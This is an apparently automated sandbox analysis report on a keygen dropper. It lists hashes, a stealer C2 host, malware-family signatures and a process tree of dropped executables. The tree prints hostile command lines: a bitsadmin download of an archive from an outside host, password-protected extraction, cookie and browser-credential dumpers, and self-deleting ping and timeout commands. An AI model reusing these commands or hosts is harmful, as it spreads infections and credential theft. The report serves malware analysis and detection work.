Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1801s
  • max time network
    1801s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    28-04-2021 13:25

General

  • Target

    keygen-step-4.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Detected facebook phishing page
  • ElysiumStealer

    ElysiumStealer (previously known as ZeromaxStealer) is an info stealer that can steal login credentials for various accounts.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Turns off Windows Defender SpyNet reporting 2 TTPs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

  • Windows security bypass 2 TTPs
  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 2 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 10 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 8 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 11 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 17 IoCs
  • Suspicious use of SetThreadContext 13 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 19 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • NTFS ADS 2 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 42 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
    1⤵
      PID:1880
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2356
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2676
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2692
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2576
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2376
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s SENS
            1⤵
              PID:1440
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
              1⤵
                PID:1284
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1244
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1088
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:296
                    • C:\Users\Admin\AppData\Roaming\gcaijiw
                      C:\Users\Admin\AppData\Roaming\gcaijiw
                      2⤵
                      • Suspicious use of SetThreadContext
                      PID:5604
                      • C:\Users\Admin\AppData\Roaming\gcaijiw
                        C:\Users\Admin\AppData\Roaming\gcaijiw
                        3⤵
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:5208
                    • C:\Users\Admin\AppData\Roaming\hbaijiw
                      C:\Users\Admin\AppData\Roaming\hbaijiw
                      2⤵
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:3076
                    • C:\Users\Admin\AppData\Roaming\gcaijiw
                      C:\Users\Admin\AppData\Roaming\gcaijiw
                      2⤵
                      • Suspicious use of SetThreadContext
                      PID:2412
                      • C:\Users\Admin\AppData\Roaming\gcaijiw
                        C:\Users\Admin\AppData\Roaming\gcaijiw
                        3⤵
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:500
                    • C:\Users\Admin\AppData\Roaming\hbaijiw
                      C:\Users\Admin\AppData\Roaming\hbaijiw
                      2⤵
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:5056
                    • C:\Users\Admin\AppData\Roaming\gcaijiw
                      C:\Users\Admin\AppData\Roaming\gcaijiw
                      2⤵
                      • Suspicious use of SetThreadContext
                      PID:5732
                      • C:\Users\Admin\AppData\Roaming\gcaijiw
                        C:\Users\Admin\AppData\Roaming\gcaijiw
                        3⤵
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:5960
                    • C:\Users\Admin\AppData\Roaming\hbaijiw
                      C:\Users\Admin\AppData\Roaming\hbaijiw
                      2⤵
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:2828
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                    1⤵
                      PID:348
                    • C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
                      "C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
                      1⤵
                      • Checks computer location settings
                      • Suspicious use of WriteProcessMemory
                      PID:3724
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                        2⤵
                        • Executes dropped EXE
                        • Drops file in Program Files directory
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:2440
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                          3⤵
                          • Loads dropped DLL
                          • Modifies registry class
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:3984
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2764
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:2632
                        • C:\Users\Admin\AppData\Local\Temp\is-8RKHV.tmp\Install.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-8RKHV.tmp\Install.tmp" /SL5="$6006A,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:4008
                          • C:\Users\Admin\AppData\Local\Temp\is-J354I.tmp\Ultra.exe
                            "C:\Users\Admin\AppData\Local\Temp\is-J354I.tmp\Ultra.exe" /S /UID=burnerch1
                            4⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Drops file in Program Files directory
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:2228
                            • C:\Program Files\Internet Explorer\PKKBRJLBQM\ultramediaburner.exe
                              "C:\Program Files\Internet Explorer\PKKBRJLBQM\ultramediaburner.exe" /VERYSILENT
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:3720
                              • C:\Users\Admin\AppData\Local\Temp\is-CH6JS.tmp\ultramediaburner.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-CH6JS.tmp\ultramediaburner.tmp" /SL5="$401EA,281924,62464,C:\Program Files\Internet Explorer\PKKBRJLBQM\ultramediaburner.exe" /VERYSILENT
                                6⤵
                                • Executes dropped EXE
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of WriteProcessMemory
                                PID:3448
                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                  7⤵
                                  • Executes dropped EXE
                                  PID:3508
                            • C:\Users\Admin\AppData\Local\Temp\95-16cdf-396-b9999-8847bedf00032\SHejefakoli.exe
                              "C:\Users\Admin\AppData\Local\Temp\95-16cdf-396-b9999-8847bedf00032\SHejefakoli.exe"
                              5⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2764
                            • C:\Users\Admin\AppData\Local\Temp\44-2eaf8-668-c94ba-1924b04f5435f\Turybasepa.exe
                              "C:\Users\Admin\AppData\Local\Temp\44-2eaf8-668-c94ba-1924b04f5435f\Turybasepa.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:1460
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kligzk4v.sav\001.exe & exit
                                6⤵
                                • Suspicious use of WriteProcessMemory
                                PID:4960
                                • C:\Users\Admin\AppData\Local\Temp\kligzk4v.sav\001.exe
                                  C:\Users\Admin\AppData\Local\Temp\kligzk4v.sav\001.exe
                                  7⤵
                                  • Executes dropped EXE
                                  PID:5080
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5rtls41g.gvf\gpooe.exe & exit
                                6⤵
                                • Suspicious use of WriteProcessMemory
                                PID:3780
                                • C:\Users\Admin\AppData\Local\Temp\5rtls41g.gvf\gpooe.exe
                                  C:\Users\Admin\AppData\Local\Temp\5rtls41g.gvf\gpooe.exe
                                  7⤵
                                  • Executes dropped EXE
                                  • Adds Run key to start application
                                  • Suspicious use of WriteProcessMemory
                                  PID:4724
                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    8⤵
                                      PID:5016
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      8⤵
                                      • Executes dropped EXE
                                      PID:3572
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      8⤵
                                        PID:5724
                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        8⤵
                                          PID:5340
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fqrj5mrg.vvr\google-game.exe & exit
                                      6⤵
                                        PID:5396
                                        • C:\Users\Admin\AppData\Local\Temp\fqrj5mrg.vvr\google-game.exe
                                          C:\Users\Admin\AppData\Local\Temp\fqrj5mrg.vvr\google-game.exe
                                          7⤵
                                          • Executes dropped EXE
                                          • Drops file in Program Files directory
                                          • Suspicious use of SetWindowsHookEx
                                          PID:5584
                                          • C:\Windows\SysWOW64\rundll32.exe
                                            "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                            8⤵
                                              PID:5844
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1uhoxtoc.whh\md1_1eaf.exe & exit
                                          6⤵
                                            PID:5652
                                            • C:\Users\Admin\AppData\Local\Temp\1uhoxtoc.whh\md1_1eaf.exe
                                              C:\Users\Admin\AppData\Local\Temp\1uhoxtoc.whh\md1_1eaf.exe
                                              7⤵
                                              • Executes dropped EXE
                                              • Checks whether UAC is enabled
                                              PID:6112
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gttgtqyy.4fk\HookSetp.exe /silent & exit
                                            6⤵
                                              PID:5816
                                              • C:\Users\Admin\AppData\Local\Temp\gttgtqyy.4fk\HookSetp.exe
                                                C:\Users\Admin\AppData\Local\Temp\gttgtqyy.4fk\HookSetp.exe /silent
                                                7⤵
                                                • Executes dropped EXE
                                                PID:5236
                                                • C:\Users\Admin\AppData\Roaming\8335250.exe
                                                  "C:\Users\Admin\AppData\Roaming\8335250.exe"
                                                  8⤵
                                                    PID:4808
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bdhxoh1x.i1h\askinstall39.exe & exit
                                                6⤵
                                                  PID:6132
                                                  • C:\Users\Admin\AppData\Local\Temp\bdhxoh1x.i1h\askinstall39.exe
                                                    C:\Users\Admin\AppData\Local\Temp\bdhxoh1x.i1h\askinstall39.exe
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:4316
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c taskkill /f /im chrome.exe
                                                      8⤵
                                                        PID:5880
                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                          taskkill /f /im chrome.exe
                                                          9⤵
                                                          • Kills process with taskkill
                                                          PID:5016
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\m15jqdvf.htt\md2_2efs.exe & exit
                                                    6⤵
                                                      PID:5560
                                                      • C:\Users\Admin\AppData\Local\Temp\m15jqdvf.htt\md2_2efs.exe
                                                        C:\Users\Admin\AppData\Local\Temp\m15jqdvf.htt\md2_2efs.exe
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Checks whether UAC is enabled
                                                        PID:6076
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\e1rjlwxl.jgu\y1.exe & exit
                                                      6⤵
                                                        PID:5240
                                                        • C:\Users\Admin\AppData\Local\Temp\e1rjlwxl.jgu\y1.exe
                                                          C:\Users\Admin\AppData\Local\Temp\e1rjlwxl.jgu\y1.exe
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          PID:4600
                                                          • C:\Users\Admin\AppData\Local\Temp\R6wllv0Aj8.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\R6wllv0Aj8.exe"
                                                            8⤵
                                                            • Executes dropped EXE
                                                            • Modifies system certificate store
                                                            PID:5564
                                                            • C:\Users\Admin\AppData\Roaming\1619616233843.exe
                                                              "C:\Users\Admin\AppData\Roaming\1619616233843.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619616233843.txt"
                                                              9⤵
                                                              • Executes dropped EXE
                                                              PID:5364
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\R6wllv0Aj8.exe"
                                                              9⤵
                                                                PID:4576
                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                  ping 127.0.0.1 -n 3
                                                                  10⤵
                                                                  • Runs ping.exe
                                                                  PID:5632
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\e1rjlwxl.jgu\y1.exe"
                                                              8⤵
                                                                PID:2800
                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                  timeout /T 10 /NOBREAK
                                                                  9⤵
                                                                  • Delays execution with timeout.exe
                                                                  PID:4344
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rm5hfucm.ux3\requête.exe & exit
                                                            6⤵
                                                              PID:5260
                                                              • C:\Users\Admin\AppData\Local\Temp\rm5hfucm.ux3\requête.exe
                                                                C:\Users\Admin\AppData\Local\Temp\rm5hfucm.ux3\requête.exe
                                                                7⤵
                                                                • Executes dropped EXE
                                                                PID:6128
                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                  PID:5040
                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                                    parse.exe -f json -b firefox
                                                                    9⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                    PID:5544
                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                                    parse.exe -f json -b chrome
                                                                    9⤵
                                                                      PID:5036
                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                                      parse.exe -f json -b edge
                                                                      9⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                      PID:5924
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yphgzwhf.ot2\SunLabsPlayer.exe /S & exit
                                                                6⤵
                                                                  PID:1840
                                                                  • C:\Users\Admin\AppData\Local\Temp\yphgzwhf.ot2\SunLabsPlayer.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\yphgzwhf.ot2\SunLabsPlayer.exe /S
                                                                    7⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    • Drops file in Program Files directory
                                                                    PID:5844
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl203D.tmp\tempfile.ps1"
                                                                      8⤵
                                                                        PID:4780
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl203D.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:2752
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl203D.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:5604
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl203D.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:4500
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl203D.tmp\tempfile.ps1"
                                                                              8⤵
                                                                                PID:3192
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl203D.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                  PID:2856
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl203D.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                    PID:4592
                                                                                  • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                    "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                                    8⤵
                                                                                    • Download via BitsAdmin
                                                                                    PID:5152
                                                                                  • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                    "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pLLuSl2AKD83zHAU -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                    8⤵
                                                                                    • Drops file in Program Files directory
                                                                                    PID:6016
                                                                                  • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                    "C:\Program Files (x86)\lighteningplayer\data_load.exe" -p8VzvDc2msuaAN2B -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                    8⤵
                                                                                      PID:3076
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl203D.tmp\tempfile.ps1"
                                                                                      8⤵
                                                                                        PID:4224
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl203D.tmp\tempfile.ps1"
                                                                                        8⤵
                                                                                          PID:2284
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl203D.tmp\tempfile.ps1"
                                                                                          8⤵
                                                                                            PID:4876
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl203D.tmp\tempfile.ps1"
                                                                                            8⤵
                                                                                              PID:6068
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl203D.tmp\tempfile.ps1"
                                                                                              8⤵
                                                                                                PID:5148
                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\PKRGnfLJSu\PKRGnfLJSu.dll" PKRGnfLJSu
                                                                                                8⤵
                                                                                                • Loads dropped DLL
                                                                                                PID:5560
                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                  C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\PKRGnfLJSu\PKRGnfLJSu.dll" PKRGnfLJSu
                                                                                                  9⤵
                                                                                                  • Loads dropped DLL
                                                                                                  • Drops file in System32 directory
                                                                                                  PID:4076
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl203D.tmp\tempfile.ps1"
                                                                                                8⤵
                                                                                                  PID:676
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl203D.tmp\tempfile.ps1"
                                                                                                  8⤵
                                                                                                    PID:4540
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl203D.tmp\tempfile.ps1"
                                                                                                    8⤵
                                                                                                      PID:6000
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl203D.tmp\tempfile.ps1"
                                                                                                      8⤵
                                                                                                        PID:3456
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl203D.tmp\tempfile.ps1"
                                                                                                        8⤵
                                                                                                          PID:5292
                                                                                                        • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                          "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                          8⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          • Checks for any installed AV software in registry
                                                                                                          PID:4592
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\myahu1hr.sde\005.exe & exit
                                                                                                      6⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:5016
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\myahu1hr.sde\005.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\myahu1hr.sde\005.exe
                                                                                                        7⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:656
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\v40elies.0f4\GcleanerWW.exe /mixone & exit
                                                                                                      6⤵
                                                                                                        PID:5248
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2l5iddn3.2gs\toolspab1.exe & exit
                                                                                                        6⤵
                                                                                                          PID:5368
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\2l5iddn3.2gs\toolspab1.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\2l5iddn3.2gs\toolspab1.exe
                                                                                                            7⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of SetThreadContext
                                                                                                            PID:3544
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\2l5iddn3.2gs\toolspab1.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\2l5iddn3.2gs\toolspab1.exe
                                                                                                              8⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Loads dropped DLL
